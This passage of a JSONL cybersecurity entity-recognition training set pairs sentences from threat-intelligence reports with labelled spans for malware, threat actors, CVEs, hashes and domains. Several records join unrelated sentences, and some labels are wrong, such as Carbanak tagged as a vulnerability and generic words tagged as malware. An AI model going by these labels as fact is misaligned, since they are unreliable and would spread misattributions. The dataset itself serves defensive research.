567]]}, "info": {"id": "cyberner_stix_train_005183", "source": "cyberner_stix_train"}}
{"text": "The following screenshots show what type of information is collected in both steps of the overlay attack : Ginp overlaysGinp overlaysGinp overlaysGinp overlays Based on Anubis Once the Anubis bot code got leaked , it was just a matter of time before new banking Trojans based on Anubis would surface . This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 . We examined the sample described in the report as Hdoor and found it ’s a previous version of the NamelessHdoor we discovered in the Minzen sample , but without support for DLL injection .", "spans": {"MALWARE: Ginp": [[107, 111]], "MALWARE: Anubis": [[169, 175], [185, 191], [279, 285]], "MALWARE: sample": [[307, 313]], "MALWARE: Trochilus": [[333, 342]], "MALWARE: Hdoor": [[602, 607]], "MALWARE: NamelessHdoor": [[650, 663]], "TOOL: DLL": [[725, 728]]}, "info": {"id": "cyberner_stix_train_005184", "source": "cyberner_stix_train"}}
{"text": "In this case , like others before , the event of a popular game release became an opportunity to trick unsuspecting users into downloading the RAT . The APT actor , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . 3.doc : d4eb4035e11da04841087a181c48cd85f75c620a84832375925e6b03973d8e48 . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked “ exploitation more likely . ”", "spans": {"THREAT_ACTOR: APT actor": [[153, 162]], "ORGANIZATION: organizations": [[209, 222]], "ORGANIZATION: financial services": [[230, 248]], "ORGANIZATION: telecoms": [[251, 259]], "ORGANIZATION: government": [[262, 272]], "ORGANIZATION: defense sectors": [[279, 294]], "FILEPATH: 3.doc": [[297, 302]], "FILEPATH: d4eb4035e11da04841087a181c48cd85f75c620a84832375925e6b03973d8e48": [[305, 369]], "VULNERABILITY: CVE-2022 - 41080": [[385, 401]], "VULNERABILITY: CVE-2022 - 41040": [[476, 492]]}, "info": {"id": "cyberner_stix_train_005185", "source": "cyberner_stix_train"}}
{"text": "Meanwhile in early-to-mid 2017 , SPLM / CHOPSTICK / XAgent detections in Central Asia provided a glimpse into ongoing focus on ex-Soviet republics in Central Asia .", "spans": {"MALWARE: SPLM": [[33, 37]], "MALWARE: CHOPSTICK": [[40, 49]], "MALWARE: XAgent": [[52, 58]]}, "info": {"id": "cyberner_stix_train_005186", "source": "cyberner_stix_train"}}
{"text": "This technique makes use of debuggers and software breakpoints useless . Organizations in the government , energy , and technology sectors have been targeted by Magic Hound , specifically organizations based in or doing business in Saudi Arabia . While continuing to monitor activity of the OceanLotus APT Group , BlackBerry Cylance researchers uncovered a novel payload loader that utilizes steganography to read an encrypted payload concealed within a .png image file . An example of these log entries can be found below : By correlating the user , IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend , CrowdStrike found a request using the mailbox to the following OWA URL , , corresponding to the IIS log entry below : The backend request for the new exploitation chain is similar to the example shown below : This request seemed to show a novel , previously undocumented , way to reach the PowerShell remoting service through the OWA frontend endpoint , instead of leveraging the endpoint .", "spans": {"ORGANIZATION: government": [[94, 104]], "ORGANIZATION: energy": [[107, 113]], "ORGANIZATION: technology sectors": [[120, 138]], "THREAT_ACTOR: OceanLotus": [[291, 301]], "ORGANIZATION: BlackBerry Cylance": [[314, 332]]}, "info": {"id": "cyberner_stix_train_005187", "source": "cyberner_stix_train"}}
{"text": "DNS queries distribution over time The campaign does n't seem to be growing at a fast pace . The 13th FYP was released in March 2016 and the sectors and organisations known to be targeted by APT10 are broadly in line with the strategic aims documented in this plan . OceanLotus : SOFTWARE\\App\\AppX06c7130ad61f4f60b50394b8cba3d35f\\Applicationz 7244 . Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns ( e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s ) ) .", "spans": {"THREAT_ACTOR: APT10": [[191, 196]], "THREAT_ACTOR: OceanLotus": [[267, 277]], "TOOL: SOFTWARE\\App\\AppX06c7130ad61f4f60b50394b8cba3d35f\\Applicationz": [[280, 342]]}, "info": {"id": "cyberner_stix_train_005188", "source": "cyberner_stix_train"}}
{"text": "It spreads under the name AvitoPay.apk ( or similar ) and downloads from websites with names like youla9d6h.tk , prodam8n9.tk , prodamfkz.ml , avitoe0ys.tk , etc . Carbanak is a backdoor used by the attackers to compromise the victim . We analyzed a new RATANKBA variant ( BKDR_RATANKBA.ZAEL–A ) , discovered in June 2017 , that uses a PowerShell script instead of its more traditional PE executable form—a version that other researchers also recently identified .", "spans": {"MALWARE: Carbanak": [[164, 172]], "TOOL: backdoor": [[178, 186]], "THREAT_ACTOR: attackers": [[199, 208]], "MALWARE: RATANKBA": [[254, 262]], "MALWARE: BKDR_RATANKBA.ZAEL–A": [[273, 293]], "MALWARE: PowerShell script": [[336, 353]]}, "info": {"id": "cyberner_stix_train_005189", "source": "cyberner_stix_train"}}
{"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . Some of the known filenames for Gray Lambert are mwapi32.dll and poolstr.dll – it should be pointed though that the filenames used by the Lamberts are generally unique and have never been used twice .", "spans": {"MALWARE: Microsoft Word attachment": [[84, 109]], "VULNERABILITY: CVE-2017-0199": [[142, 155]], "TOOL: ZeroT Trojan": [[170, 182]], "TOOL: PlugX Remote Access Trojan": [[214, 240]], "TOOL: RAT": [[243, 246]], "MALWARE: Gray Lambert": [[283, 295]], "MALWARE: mwapi32.dll": [[300, 311]], "MALWARE: poolstr.dll": [[316, 327]], "MALWARE: Lamberts": [[389, 397]]}, "info": {"id": "cyberner_stix_train_005190", "source": "cyberner_stix_train"}}
{"text": "In the case of CVE-2010-0232 , the exploit appears to be based directly on the proof of concept code published by security researcher Tavis Ormandy when he disclosed the vulnerability .", "spans": {"VULNERABILITY: CVE-2010-0232": [[15, 28]]}, "info": {"id": "cyberner_stix_train_005191", "source": "cyberner_stix_train"}}
{"text": "The group attempted to deploy this spearphish attachment to push a small 30kb backdoor known as GAMEFISH to targets in Europe at the beginning of 2017 .", "spans": {"MALWARE: GAMEFISH": [[96, 104]]}, "info": {"id": "cyberner_stix_train_005192", "source": "cyberner_stix_train"}}
{"text": "This does however still rule out the possibility that the Dukes simply obtained copies of the exploit binaries described by FireEye and repurposed them .", "spans": {"THREAT_ACTOR: Dukes": [[58, 63]], "ORGANIZATION: FireEye": [[124, 131]]}, "info": {"id": "cyberner_stix_train_005193", "source": "cyberner_stix_train"}}
{"text": "According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors .", "spans": {"ORGANIZATION: FireEye": [[13, 20]], "THREAT_ACTOR: admin@338": [[27, 36]], "VULNERABILITY: Microsoft Office vulnerabilities": [[104, 136]], "TOOL: LOWBALL": [[187, 194]], "FILEPATH: documents": [[201, 210]], "VULNERABILITY: CVE-2012-0158": [[294, 307]], "TOOL: Microsoft Word": [[363, 377]], "VULNERABILITY: vulnerabilities": [[378, 393]]}, "info": {"id": "cyberner_stix_train_005194", "source": "cyberner_stix_train"}}
{"text": "Figure 6 : bit.ly statistics for the fake Bank Austria Android app download link From this small sample , we see that 7 % of visitors clicked through to download the application , which is actually a version of the Marcher banking Trojan named “ BankAustria.apk ” , continuing the fraudulent use of the bank ’ s branding to fool potential victims . The threat actors were able to maintain long term persistent access to many of these networks by utilizing compromised credentials . APT3 is a China based threat group that researchers have attributed to China's Ministry of StateSecurity .", "spans": {"SYSTEM: Bank Austria Android app": [[42, 66]], "MALWARE: Marcher banking Trojan": [[215, 237]], "THREAT_ACTOR: threat actors": [[353, 366]], "THREAT_ACTOR: APT3": [[482, 486]], "ORGANIZATION: China's Ministry of StateSecurity": [[553, 586]]}, "info": {"id": "cyberner_stix_train_005195", "source": "cyberner_stix_train"}}
{"text": "To overcome this issue , “ Agent Smith ” found another solution . The first encounter with Buhtrap was registered back in 2014 . If the process is not halted , Dexphot decompresses the password-protected ZIP archive from the MSI package . However , the template source code is quite different and the payload delivery uses different infrastructure .", "spans": {"MALWARE: Agent Smith": [[27, 38]], "MALWARE: Dexphot": [[160, 167]], "TOOL: MSI": [[225, 228]]}, "info": {"id": "cyberner_stix_train_005197", "source": "cyberner_stix_train"}}
{"text": "TG-3390 : apigmail.com .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "DOMAIN: apigmail.com": [[10, 22]]}, "info": {"id": "cyberner_stix_train_005198", "source": "cyberner_stix_train"}}
{"text": "HenBox has ties to infrastructure used in targeted attacks with a focus on politics in South East Asia . The delivery of KopiLuwak in this instance is currently unknown as the MSIL dropper has only been observed by Proofpoint researchers on a public malware repository . Researchers have pointed out that it is not uncommon for admin@338 to target Hong Kong media organizations , particularly ones whose reporting focuses on the pro-democracy movement .", "spans": {"MALWARE: HenBox": [[0, 6]], "MALWARE: MSIL dropper": [[176, 188]], "ORGANIZATION: Proofpoint": [[215, 225]], "THREAT_ACTOR: admin@338": [[328, 337]], "ORGANIZATION: media organizations": [[358, 377]]}, "info": {"id": "cyberner_stix_train_005199", "source": "cyberner_stix_train"}}
{"text": "Something that makes Ginp special is that all of its overlay screens for banking apps are consist of multiple steps , first stealing the victim ’ s login credentials , then stealing the credit card details ( to “ validate ” the user identity ) , as shown in the screenshots hereafter : The following code snippet shows that after the second overlay is filled-in and validated , it disappears and the targeted application is added to the list of packages names to be ignored for future overlays attacks . Recorded Future’s Insikt Group has actively tracked APT10 for several years , focusing specifically on the group’s targeting of MSPs and global internet infrastructure providers since the Operation Cloud Hopper report in 2017 . The oldest code we could identify was hosted on a famous Chinese source code sharing site since 2005 .", "spans": {"MALWARE: Ginp": [[21, 25]], "ORGANIZATION: Recorded Future’s": [[504, 521]], "ORGANIZATION: MSPs": [[632, 636]], "ORGANIZATION: infrastructure providers": [[657, 681]]}, "info": {"id": "cyberner_stix_train_005200", "source": "cyberner_stix_train"}}
{"text": "SuperService also tracks its own status and relaunches if stopped . The archive contains an .exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon . The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April .", "spans": {"MALWARE: .exe file": [[92, 101]], "MALWARE: Microsoft Word file": [[129, 148]], "TOOL: SMBv1": [[239, 244]], "VULNERABILITY: exploit": [[245, 252]], "THREAT_ACTOR: Shadow Brokers": [[296, 310]]}, "info": {"id": "cyberner_stix_train_005201", "source": "cyberner_stix_train"}}
{"text": "The njRAT used in this cyber attack was built from this builder kit .", "spans": {"MALWARE: njRAT": [[4, 9]]}, "info": {"id": "cyberner_stix_train_005202", "source": "cyberner_stix_train"}}
{"text": "The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . The primary backdoor used in the Epic attacks is also known as \" WorldCupSec \" , \" TadjMakhal \" , \" Wipbot \" or \" Tavdig \" .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: Daserf malware": [[92, 106]], "VULNERABILITY: Flash exploits": [[132, 146]], "THREAT_ACTOR: WorldCupSec": [[230, 241]], "THREAT_ACTOR: TadjMakhal": [[248, 258]], "THREAT_ACTOR: Wipbot": [[265, 271]], "THREAT_ACTOR: Tavdig": [[279, 285]]}, "info": {"id": "cyberner_stix_train_005203", "source": "cyberner_stix_train"}}
{"text": "The new text ( in Chinese , about relations between China , Japan and the disputed “ Senkaku Islands / Diaoyudao Islands / Diaoyutai Islands ” ) is shown to the victims and reads as following : When opened in a browser , this is what the command-and-control index page looks like : The text on the top means “ Title Title Title ” in Chinese , while the other strings appear to be random characters typed from the keyboard . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . All 13 countries where Kaspersky reportedly observed BlackOasis activity are connected to Saudi Arabia in one of three ACTs : economically ; from a national security perspective ; or due to established policy agreements .", "spans": {"MALWARE: document": [[431, 439]], "VULNERABILITY: CVE-2012-0158": [[488, 501]], "VULNERABILITY: CVE-2013-3906": [[504, 517]], "VULNERABILITY: CVE-2014-1761": [[521, 534]], "ORGANIZATION: Kaspersky": [[625, 634]]}, "info": {"id": "cyberner_stix_train_005204", "source": "cyberner_stix_train"}}
{"text": "We found get.adobe.go-microstf.com hosted at 104.218.120.128 around the time this campaign was ongoing , November 2016 .", "spans": {"DOMAIN: get.adobe.go-microstf.com": [[9, 34]], "IP_ADDRESS: 104.218.120.128": [[45, 60]]}, "info": {"id": "cyberner_stix_train_005205", "source": "cyberner_stix_train"}}
{"text": "The admin@338 started targeting Hong Kong media companies , probably in response to political and economic challenges in Hong Kong and China . he Trojan , a hybrid of Nymaim and Gozi malware , initially formed in April and thrives on carrying out redirection attacks via DNS poisoning .", "spans": {"THREAT_ACTOR: admin@338": [[4, 13]], "ORGANIZATION: media companies": [[42, 57]], "ORGANIZATION: political": [[84, 93]], "ORGANIZATION: economic": [[98, 106]], "MALWARE: Trojan": [[146, 152]], "MALWARE: Nymaim": [[167, 173]], "MALWARE: Gozi": [[178, 182]], "MALWARE: malware": [[183, 190]]}, "info": {"id": "cyberner_stix_train_005206", "source": "cyberner_stix_train"}}
{"text": "The executable file , xxxx.exe in this case , is then executed .", "spans": {"FILEPATH: xxxx.exe": [[22, 30]]}, "info": {"id": "cyberner_stix_train_005207", "source": "cyberner_stix_train"}}
{"text": "Once started , the code in the main thread resolves the basic API functions it needs and loads an additional library from the following location : “ %TEMP%\\tf394kv.dll ” .", "spans": {"FILEPATH: %TEMP%\\tf394kv.dll": [[149, 167]]}, "info": {"id": "cyberner_stix_train_005208", "source": "cyberner_stix_train"}}
{"text": "A few days back , we wrote about an Android Marcher trojan variant posing as the Super Mario Run game for Android . The admin@338 started targeting Hong Kong media companies , probably in response to political and economic challenges in Hong Kong and China . Morphisec researchers began investigating the attacks on April 24 and continue to uncover more details . As we commonly see in the ransomware space , this threat is delivered through a variety of mechanisms which can include phishing and being dropped as secondary payloads from command and control ( C2 ) frameworks like Cobalt Strike .", "spans": {"SYSTEM: Android": [[36, 43], [106, 113]], "MALWARE: Marcher": [[44, 51]], "SYSTEM: Super Mario Run": [[81, 96]], "THREAT_ACTOR: admin@338": [[120, 129]], "ORGANIZATION: media companies": [[158, 173]], "ORGANIZATION: political and economic challenges": [[200, 233]], "ORGANIZATION: Morphisec researchers": [[259, 280]], "SYSTEM: control ( C2 ) frameworks": [[550, 575]], "SYSTEM: Cobalt Strike": [[581, 594]]}, "info": {"id": "cyberner_stix_train_005209", "source": "cyberner_stix_train"}}
{"text": "Threat actors continue to exploit the CVE-2019-0604 vulnerability to compromise SharePoint servers , which is a vulnerability that Microsoft released a patch for in March 2019 .", "spans": {"VULNERABILITY: CVE-2019-0604": [[38, 51]], "TOOL: SharePoint": [[80, 90]], "ORGANIZATION: Microsoft": [[131, 140]]}, "info": {"id": "cyberner_stix_train_005210", "source": "cyberner_stix_train"}}
{"text": "A buffer overflow vulnerability exists in Adobe Flash Player ( <=17.0.0.134 ) when parsing malformed FLV objects .", "spans": {"TOOL: Adobe Flash Player": [[42, 60]], "TOOL: FLV": [[101, 104]]}, "info": {"id": "cyberner_stix_train_005211", "source": "cyberner_stix_train"}}
{"text": "The malware simulates clicks on app advertisements provided by legitimate ad networks and forces the app to install on a device . APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns . the pattern matching function replaces dword_745BB58C * ( dword_745BB58C – 1 ) Investigate anomalous activity and correlate findings with process telemetry .", "spans": {"THREAT_ACTOR: APT39": [[130, 135]], "ORGANIZATION: telecommunications and travel industries": [[152, 192]], "ORGANIZATION: specific individuals": [[279, 299]]}, "info": {"id": "cyberner_stix_train_005212", "source": "cyberner_stix_train"}}
{"text": "Chunghwa Post - The government-owned corporation Chunghwa is the official postal service of Taiwan . Since late March , suspected APT33 threat actors have continued to use a large swath of operational infrastructure , well in excess of 1 , 200 domains , with many observed communicating with 19 different commodity RAT implants . The GCMAN group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them , using the same APT-style tools and techniques .", "spans": {"ORGANIZATION: Chunghwa Post": [[0, 13]], "ORGANIZATION: Chunghwa": [[49, 57]], "THREAT_ACTOR: APT33": [[130, 135]], "TOOL: RAT": [[315, 318]], "THREAT_ACTOR: GCMAN group": [[334, 345]], "ORGANIZATION: banks": [[363, 368]], "ORGANIZATION: budgeting": [[394, 403]], "ORGANIZATION: accounting departments": [[408, 430]]}, "info": {"id": "cyberner_stix_train_005213", "source": "cyberner_stix_train"}}
{"text": "Targeting antivirus companies appears to have been the primary goal of Fxmps' latest network intrusions . The PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) .", "spans": {"ORGANIZATION: antivirus companies": [[10, 29]], "THREAT_ACTOR: PassCV group": [[110, 122]], "MALWARE: RATs": [[161, 165]]}, "info": {"id": "cyberner_stix_train_005214", "source": "cyberner_stix_train"}}
{"text": "This indicates that the authors are trying to hide some messages showed by the system during the setup process . The resume contained the PupyRAT backdoor , which communicated with known APT35 infrastructure . Performing the same steps in CyberChef , it is possible to decode the encrypted payload , which should yield x86 shellcode , starting with a call immediate opcode sequence . If the main function is called with only , it will only perform its cleanup routine and immediately terminate .", "spans": {"TOOL: PupyRAT backdoor": [[138, 154]], "THREAT_ACTOR: APT35": [[187, 192]], "TOOL: CyberChef": [[239, 248]]}, "info": {"id": "cyberner_stix_train_005215", "source": "cyberner_stix_train"}}
{"text": "] 205 [ . The Dukes actively targeted Ukraine before the crisis , at a time when Russia was still weighing her options , but once Russia moved from diplomacy to direct action , Ukraine was no longer relevant to the Dukes in the same way . It should be noted that the contents of o402ek2m.php were updated by the attackers to reference different pastebin uploads throughout this campaign . JumpCloud confirmed the commands framework was used for malicious data injections in their security incident disclosure .", "spans": {"THREAT_ACTOR: Dukes": [[14, 19], [215, 220]], "FILEPATH: o402ek2m.php": [[279, 291]]}, "info": {"id": "cyberner_stix_train_005216", "source": "cyberner_stix_train"}}
{"text": "We were also able to find a related webshell based on the threat group ’s tool reuse , specifically a custom Mimikatz sample .", "spans": {"TOOL: Mimikatz": [[109, 117]]}, "info": {"id": "cyberner_stix_train_005217", "source": "cyberner_stix_train"}}
{"text": "For example , when a button is clicked , a view is focused , etc . The second group , known as DragonOK , targets high-tech and manufacturing companies in Japan and Taiwan . ShadowHammer : https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER359.zip . Umbrella , Cisco ’s secure internet gateway ( SIG ) , blocks users from connecting to malicious domains , IPs and URLs , whether users are on or off the corporate network .", "spans": {"THREAT_ACTOR: group": [[78, 83]], "THREAT_ACTOR: DragonOK": [[95, 103]], "ORGANIZATION: high-tech": [[114, 123]], "ORGANIZATION: manufacturing companies": [[128, 151]], "THREAT_ACTOR: ShadowHammer": [[174, 186]], "URL: https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER359.zip": [[189, 283]], "TOOL: Umbrella": [[286, 294]], "TOOL: Cisco ’s secure internet gateway ( SIG )": [[297, 337]]}, "info": {"id": "cyberner_stix_train_005218", "source": "cyberner_stix_train"}}
{"text": "The number at the end of the password corresponds to the year of the intrusion .", "spans": {}, "info": {"id": "cyberner_stix_train_005219", "source": "cyberner_stix_train"}}
{"text": "However , his study results are out of the scope of our research . The malware appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD (via Bitcoin) to decrypt the data . SHA256 : 94113c9968db13e3412c1b9c1c882592481c559c0613dbccfed2fcfc80e77dc5 .", "spans": {"MALWARE: malware": [[71, 78]], "MALWARE: .WCRY extension": [[117, 132]], "FILEPATH: 94113c9968db13e3412c1b9c1c882592481c559c0613dbccfed2fcfc80e77dc5": [[247, 311]]}, "info": {"id": "cyberner_stix_train_005220", "source": "cyberner_stix_train"}}
{"text": "Lookout Discovers Phishing Sites Distributing New IOS And Android Surveillanceware April 8 , 2019 For the past year , Lookout researchers have been tracking Android and iOS surveillanceware , that can exfiltrate contacts , audio recordings , photos , location , and more from devices . Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa . Over the past year , we've seen the group extensively targeting a wide gamut of entities in various sectors , including Governments , Academy , Crypto-Currency , Telecommunications and the Oil sectors .", "spans": {"ORGANIZATION: Lookout": [[0, 7], [118, 125]], "SYSTEM: IOS": [[50, 53]], "SYSTEM: Android": [[58, 65], [157, 164]], "MALWARE: Surveillanceware": [[66, 82]], "SYSTEM: iOS": [[169, 172]], "MALWARE: surveillanceware": [[173, 189]], "VULNERABILITY: Carbanak": [[324, 332]], "THREAT_ACTOR: attackers": [[333, 342]], "ORGANIZATION: Governments": [[578, 589]], "ORGANIZATION: Academy": [[592, 599]], "ORGANIZATION: Crypto-Currency": [[602, 617]], "ORGANIZATION: Telecommunications": [[620, 638]], "ORGANIZATION: Oil sectors": [[647, 658]]}, "info": {"id": "cyberner_stix_train_005221", "source": "cyberner_stix_train"}}
{"text": "The report authors renamed the malware \" FriedEx \" . ScarCruft has a keen interest in North Korean affairs , attacking those in the business sector who may have any connection to North Korea , as well as diplomatic agencies around the globe .", "spans": {"TOOL: FriedEx": [[41, 48]], "THREAT_ACTOR: ScarCruft": [[53, 62]], "ORGANIZATION: business sector": [[132, 147]], "ORGANIZATION: diplomatic agencies": [[204, 223]]}, "info": {"id": "cyberner_stix_train_005222", "source": "cyberner_stix_train"}}
{"text": "Figure 11 . We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . SHA256 : 69a9d7aa0cb964c091ca128735b6e60fa7ce028a2ba41d99023dd57c06600fe0 .", "spans": {"MALWARE: them": [[34, 38]], "FILEPATH: 69a9d7aa0cb964c091ca128735b6e60fa7ce028a2ba41d99023dd57c06600fe0": [[184, 248]]}, "info": {"id": "cyberner_stix_train_005223", "source": "cyberner_stix_train"}}
{"text": "Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) . ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "VULNERABILITY: flash exploit": [[96, 109]], "VULNERABILITY: CVE-2015-5119": [[112, 125]], "ORGANIZATION: Department of Homeland Security": [[250, 281]]}, "info": {"id": "cyberner_stix_train_005224", "source": "cyberner_stix_train"}}
{"text": "If a typical user tries to get rid of the malicious app , chances are that only the shortcut ends up getting removed . However , the unique malware variant , BlackEnergy 3 , reemerged in Ukraine early in 2015 , where we had first found Sandworm Team . The RAT has remained under the Radar for multiple years .", "spans": {"MALWARE: BlackEnergy 3": [[158, 171]], "THREAT_ACTOR: Sandworm Team": [[236, 249]], "TOOL: Radar": [[283, 288]]}, "info": {"id": "cyberner_stix_train_005225", "source": "cyberner_stix_train"}}
{"text": "While analyzing a campaign run by the Gamaredon group , FortiGuard Labs discovered the tools they used to prepare the attack and found artifacts left behind by the actors that allowed us to perform a large amount of forensic analysis . The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East , which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604 . The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 ( EternalBlue ) that we saw uploaded to the other errr.aspx webshell . According to Microsoft’s advisory , this vulnerability was patched on March 12 , 2019 and we first saw the webshell activity on April 1 , 2019 . We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 ( EternalBlue ) vulnerability patched in MS17-010 . Once the adversary established a foothold on the targeted network , they used China Chopper and other webshells to upload additional tools to the SharePoint server to dump credentials , perform network reconnaissance and pivot to other systems . We also observed Emissary Panda uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and the Microsoft’s Create Media application , both of which we had never seen used for DLL sideloading before . Consequently , the Linux malware ecosystem is plagued by financial driven crypto-miners and DDoS botnet tools which mostly target vulnerable servers . We also observed the actors uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and the Microsoft’s Create Media application , both of which we had never seen used for DLL sideloading before . It has been active since at least 2013 , and has targeted individuals likely involved with the Ukrainian government . The group’s implants are characterized by the employment of information stealing tools among them being screenshot and document stealers delivered via a SFX , and made to achieve persistence through a scheduled task . The finding shows that EvilGnome operates on an IP address that was controlled by the Gamaredon group two months ago . FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015 . The FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year . In addition , during the investigation , we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations . In 2018-2019 , researchers of Kaspersky Lab’s Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures (TTPs) as the historic FIN7 , leading the researchers to believe that this threat actor had remained active despite the 2018 arrests . One of the domains used by FIN7 in their 2018 campaign of spear phishing contained more than 130 email APTes , leading us to think that more than 130 companies had been targeted by the end of 2018 . Interestingly , following some open-source publications about them , the FIN7 operators seems to have developed a homemade builder of malicious Office document using ideas from ThreadKit , which they employed during the summer of 2018 . The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less” aspect of this method . Given FIN7’s previous use of false security companies , we decided to look deeper into this one . This activity cluster , which Kaspersky Lab has followed for a few years , uses various implants for targeting mainly banks , and developers of banking and money processing software solutions . FIN7’s last campaigns were targeting banks in Europe and Central America . After a successful penetration , FIN7 uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network , where it can monetize its access . AveMaria is a new botnet , whose first version we found in September 2018 , right after the arrests of the FIN7 members . This threat actor stole suspected of stealing €13 million from Bank of Valetta , Malta earlier this year . In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc. , and can act as a keylogger . They also use AutoIT droppers , password-protected EXE files and even ISO images . To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT . Interestingly , this actor targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . At the end of 2018 , while searching for new FIN7 campaigns via telemetry , we discovered a set of activity that we temporarily called CopyPaste” from a previously unknown APT . FIN7 and Cobalt used decoy 302 HTTP redirections too , FIN7 on its GRIFFON C2s before January 2018 , and Cobalt , on its staging servers , similar to CopyPaste . Quite recently , FIN7 threat actors typosquatted the brand Digicert” using the domain name digicert-cdn[.]com , which is used as a command and control server for their GRIFFON implants . The first of them is the well-known FIN7 , which specializes in attacking various companies to get access to financial data or PoS infrastructure . The second one is CobaltGoblin Carbanak EmpireMonkey , which uses the same toolkit , techniques and similar infrastructure but targets only financial institutions and associated software/services providers . we observe , with various level of confidence , that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks . The last piece is the newly discovered CopyPaste group , who targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . At the end of 2018 , the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims’ networks . FIN7 thus continues to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . MuddyWater is widely regarded as a long-lived APT group in the Middle East . From February to April 2019 , MuddyWater launched a series of spear-phishing attacks against governments , educational institutions , financial , telecommunications and defense companies in Turkey , Iran , Afghanistan , Iraq , Tajikistan and Azerbaijan . FIN7 thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . We also unearthed and detailed our other findings on MuddyWater , such as its connection to four Android malware variants and its use of false flag techniques , among others , in our report New MuddyWater Activities Uncovered: Threat Actors Used Multi-Stage Backdoors , False Flags , Android malware , and More . Instead , the campaign used compromised legitimate accounts to trick victims into installing malware . Notably , the group’s use of email as infection vector seems to yield success for their campaigns . We also observed MuddyWater’s use of multiple open source post-exploitation tools , which they deployed after successfully compromising a target . The attacker also connected to the compromised servers from IP addresses that were linked to dynamic domain names used as C&Cs by the delivered payloads . The main payload is usually Imminent Monitor RAT ; however , at the beginning of 2018 , we also observed the use of LuminosityLink RAT , NetWire RAT , and NjRAT . In a case in June 2019 , we also noticed Warzone RAT being used . Xpert RAT reportedly first appeared in 2011 . The first version of Proyecto RAT” was published at the end of 2010 . But with the West African gang we’ve named Scattered Canary , we have a deeper look at how business email compromise is connected to the rest of the cybercrime .", "spans": {"THREAT_ACTOR: Gamaredon": [[38, 47]], "ORGANIZATION: FortiGuard Labs": [[56, 71]], "THREAT_ACTOR: actors": [[164, 170], [893, 899], [1712, 1718]], "THREAT_ACTOR: Emissary Panda": [[240, 254], [1316, 1330]], "MALWARE: China Chopper": [[279, 292], [1131, 1144]], "VULNERABILITY: CVE-2019-0604": [[500, 513]], "MALWARE: python script": [[579, 592]], "VULNERABILITY: CVE-2017-0144": [[648, 661], [987, 1000]], "VULNERABILITY: EternalBlue": [[664, 675], [1003, 1014]], "FILEPATH: errr.aspx": [[712, 721]], "ORGANIZATION: Microsoft’s": [[746, 757]], "FILEPATH: MS17-010": [[1042, 1050]], "THREAT_ACTOR: they": [[1121, 1125]], 